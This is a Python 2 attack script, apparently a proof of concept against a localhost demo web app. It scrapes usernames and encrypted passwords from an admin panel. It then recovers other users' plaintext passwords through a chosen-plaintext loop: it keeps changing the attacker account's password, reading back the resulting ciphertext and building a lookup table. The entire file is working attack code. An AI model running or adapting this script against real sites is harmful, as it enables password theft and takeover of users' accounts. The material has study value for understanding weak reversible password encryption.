#!/usr/bin/python
from __future__ import print_function
import sys,os
import urllib2
import time
import encodecrack
import urllib

#helper to fetch url and return html
def getUrl(url,userAgent='Lynx/2.8.3rel.1 libwww-FM/2.14FM'):
	request = urllib2.Request(url)
	request.add_header('User-Agent',userAgent)
	opener = urllib2.build_opener()
	urllib2.install_opener(opener)

	html = opener.open(request).read()
	return html


### Stage 1: Load your ciphertexts (e.g. usernames and passwords) ###

#get a dict of username => password from the 'admin panel'
#note: you can load it from a file or from anywhere else
page = getUrl("http://localhost/mysqlencode/adminpanel.php").split('<br>')

#users is the dictinary, looks like: username => cipher-password
users = dict()
for line in page:
	if(line != ""):
		fpos = line.find('<span>') + 6
		lpos = line.find('</span>',fpos)
		user = line[fpos:lpos]
		
		fpos = line.find('<span>',fpos) + 6
		lpos = line.find('</span>',fpos)
		password = line[fpos:lpos]
		password = password.decode('hex')
		users[user] = str(password)

result = False

#loop through all users we loaded before
for user in users.keys():
	#count time
	starttime = time.time()

	tries = 0
	#if its our user - continue and dont crack it
	if(user == 'CyberInt'): continue
	
	print("\n\nBrute-forcing user: "+user+".\ncipher password is: "+users[user].encode('hex'))
	
	#loop until we crack the password
	while(True):
		result = encodecrack.decode_cipher(users[user])
		
		#if decode_cipher returns true - the plain text password will stored in the global variable 'decode_result'
		if(result == True):
			endtime = float(time.time() - starttime)
			print ("\n\nCracked the code for user: "+user+".\ncipher is: '" +users[user].encode('hex')+"'\npass is: '" + encodecrack.decode_result+"'\nTried "+str(tries)+" passwords.\ntime taken: "+str(endtime)+" sec.")
			break
			
### Stage 2: change the cipher text (e.g. password) in the server ###		
		#if decode_cipher return false - 'decode_result' will store the next password to search for
		plain_pass = encodecrack.decode_result
	
		#this request will change the password of the attacker to what we told to change it to
		getUrl("http://localhost/mysqlencode/changepassword.php?user=CyberInt&password="+urllib.quote_plus(plain_pass))

### Stage 3: Read our changed password (using SQL injection, admin panel from wherever you want) ###
		#read the hidden admin panel page and get our (user is 'CyberInt') modified encrypted password
		page = getUrl("http://localhost/mysqlencode/adminpanel.php")
		fpos = page.find('<span>CyberInt</span>') + 5
		fpos = page.find('<span>',fpos) + 6
		lpos = page.find('</span>',fpos)

		cipher_pass = page[fpos:lpos]
		cipher_pass = cipher_pass.decode("hex")

		#print cracking progress
		print('Testing plaintext: '+plain_pass, end='\r')
		sys.stdout.flush()

		#add new cipher - plaintext pair to the dictinary from what we told to find before in stage 2
		encodecrack.add_cipher(cipher_pass,plain_pass)
		
		tries += 1
		
	#uncomment this if you want to delete the keys after every cipher cracked:
	#encodecrack.keychain = dict()


